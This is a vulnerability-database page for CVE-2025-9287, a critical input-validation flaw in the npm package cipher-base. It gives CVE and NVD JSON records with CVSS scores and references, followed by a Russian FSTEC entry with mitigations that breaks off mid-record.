Vulnerability-Lookup

CVE-2025-9287 (GCVE-0-2025-9287)

Vulnerability from cvelistv5 – Published: 2025-08-20 21:43 – Updated: 2025-11-03 18:14

Title

Missing type checks leading to hash rewind and passing on crafted data

Summary

Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.

Severity

9.1 (Critical)


                        
                          CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

CWE

CWE-20 - Improper Input Validation

Assigner

harborist

References

2 references

URL	Tags
https://github.com/browserify/cipher-base/securit…	vendor-advisory
https://github.com/browserify/cipher-base/pull/23	patch

Impacted products

1 product

Vendor	Product	Version
		Affected: 0 , ≤ 1.0.4 (semver)

Credits

https://github.com/ChALkeR https://github.com/ChALkeR https://github.com/ChALkeR https://github.com/ljharb

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-9287",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-21T13:25:49.498638Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-21T14:48:11.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T18:14:17.043Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://npmjs.com/cipher-base",
          "defaultStatus": "unaffected",
          "packageName": "cipher-base",
          "repo": "https://github.com/browserify/cipher-base",
          "versions": [
            {
              "lessThanOrEqual": "1.0.4",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "https://github.com/ChALkeR"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "https://github.com/ChALkeR"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "https://github.com/ChALkeR"
        },
        {
          "lang": "en",
          "type": "coordinator",
          "value": "https://github.com/ljharb"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.\u003cp\u003eThis issue affects cipher-base: through 1.0.4.\u003c/p\u003e"
            }
          ],
          "value": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-153",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-153 Input Data Manipulation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20 Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-20T21:43:56.548Z",
        "orgId": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
        "shortName": "harborist"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/browserify/cipher-base/pull/23"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Missing type checks leading to hash rewind and passing on crafted data",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
    "assignerShortName": "harborist",
    "cveId": "CVE-2025-9287",
    "datePublished": "2025-08-20T21:43:56.548Z",
    "dateReserved": "2025-08-20T21:38:26.339Z",
    "dateUpdated": "2025-11-03T18:14:17.043Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2025-9287",
      "date": "2026-05-30",
      "epss": "0.00152",
      "percentile": "0.35512"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-9287\",\"sourceIdentifier\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"published\":\"2025-08-20T22:15:30.557\",\"lastModified\":\"2025-11-03T19:16:17.187\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.\"},{\"lang\":\"es\",\"value\":\"La vulnerabilidad de validaci\u00f3n de entrada incorrecta en cipher-base permite la manipulaci\u00f3n de datos de entrada. Este problema afecta a cipher-base: hasta 1.0.4.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:browserify:cipher-base:*:*:*:*:*:node.js:*:*\",\"versionEndIncluding\":\"1.0.4\",\"matchCriteriaId\":\"485D8065-DEFF-404E-934D-DCA8E4C10860\"}]}]}],\"references\":[{\"url\":\"https://github.com/browserify/cipher-base/pull/23\",\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\",\"source\":\"7ffcee3d-2c14-4c3e-b844-86c6a321a158\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-9287\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-21T13:25:49.498638Z\"}}}], \"references\": [{\"url\": \"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-21T13:25:51.520Z\"}}], \"cna\": {\"title\": \"Missing type checks leading to hash rewind and passing on crafted data\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"reporter\", \"value\": \"https://github.com/ChALkeR\"}, {\"lang\": \"en\", \"type\": \"finder\", \"value\": \"https://github.com/ChALkeR\"}, {\"lang\": \"en\", \"type\": \"remediation developer\", \"value\": \"https://github.com/ChALkeR\"}, {\"lang\": \"en\", \"type\": \"coordinator\", \"value\": \"https://github.com/ljharb\"}], \"impacts\": [{\"capecId\": \"CAPEC-153\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-153 Input Data Manipulation\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 9.1, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/browserify/cipher-base\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"1.0.4\"}], \"packageName\": \"cipher-base\", \"collectionURL\": \"https://npmjs.com/cipher-base\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"https://github.com/browserify/cipher-base/pull/23\", \"tags\": [\"patch\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.\u003cp\u003eThis issue affects cipher-base: through 1.0.4.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20 Improper Input Validation\"}]}], \"providerMetadata\": {\"orgId\": \"7ffcee3d-2c14-4c3e-b844-86c6a321a158\", \"shortName\": \"harborist\", \"dateUpdated\": \"2025-08-20T21:43:56.548Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-9287\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-21T14:48:11.690Z\", \"dateReserved\": \"2025-08-20T21:38:26.339Z\", \"assignerOrgId\": \"7ffcee3d-2c14-4c3e-b844-86c6a321a158\", \"datePublished\": \"2025-08-20T21:43:56.548Z\", \"assignerShortName\": \"harborist\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

BDU:2025-10188

Vulnerability from fstec - Published: 21.08.2025

Title

Уязвимость пакета cipher-base программной платформы Node.js, позволяющая нарушителю выполнить произвольный код

Description

Уязвимость пакета cipher-base программной платформы Node.js связана с недостатками механизма проверки входных данных. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить произвольный код путем отправки специально сформированного JSON-файла

Severity


                    
                      AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


                    
                      AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

Vendor

Node.js Foundation, Сообщество свободного программного обеспечения

Software Name

Node.js, cipher-base

Software Version

- (Node.js), до 1.0.4 (cipher-base)

Possible Mitigations

Установка обновлений из доверенных источников. В связи со сложившейся обстановкой и введенными санкциями против Российской Федерации рекомендуется устанавливать обновления программного обеспечения только после оценки всех сопутствующих рисков. Компенсирующие меры: - использование антивирусного программного обеспечения для проверки файлов, полученных из недоверенных источников; - использование замкнутой программной среды для работы с файлами, полученными из недоверенных источников; - использование средств межсетевого экранирования для ограничения возможности удалённого доступа к уязвимому программному обеспечению; - использование систем обнаружения и предотвращения вторжений для обнаружения (выявления, регистрации) и реагирования на попытки эксплуатации уязвимостей; - ограничение доступа к уязвимому программному обеспечению из внешних сетей (Интернет). Источники информации: https://github.com/browserify/cipher-base/pull/23

Reference

https://github.com/browserify/cipher-base/pull/23 https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc

CWE

CWE-20

JSON

To clipboard

{
  "CVSS 2.0": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
  "CVSS 3.0": "AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  "CVSS 4.0": "AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
  "remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
  "remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
  "\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "Node.js Foundation, \u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "- (Node.js), \u0434\u043e 1.0.4 (cipher-base)",
  "\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0438\u0437 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432. \u0412 \u0441\u0432\u044f\u0437\u0438 \u0441\u043e \u0441\u043b\u043e\u0436\u0438\u0432\u0448\u0435\u0439\u0441\u044f \u043e\u0431\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439 \u0438 \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0430\u043d\u043a\u0446\u0438\u044f\u043c\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0446\u0435\u043d\u043a\u0438 \u0432\u0441\u0435\u0445 \u0441\u043e\u043f\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0440\u0438\u0441\u043a\u043e\u0432.\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0445 \u0438\u0437 \u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u043c\u043a\u043d\u0443\u0442\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c\u0438 \u0438\u0437 \u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (\u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f, \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438) \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439;\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e \u0438\u0437 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0435\u0442\u0435\u0439 (\u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442). \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438:\nhttps://github.com/browserify/cipher-base/pull/23",
  "\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "21.08.2025",
  "\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "22.08.2025",
  "\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "22.08.2025",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2025-10188",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2025-9287",
  "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
  "\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
  "\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "Node.js, cipher-base",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0430\u043a\u0435\u0442\u0430 cipher-base \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Node.js, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434",
  "\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (CWE-20)",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0430\u043a\u0435\u0442\u0430 cipher-base \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Node.js \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 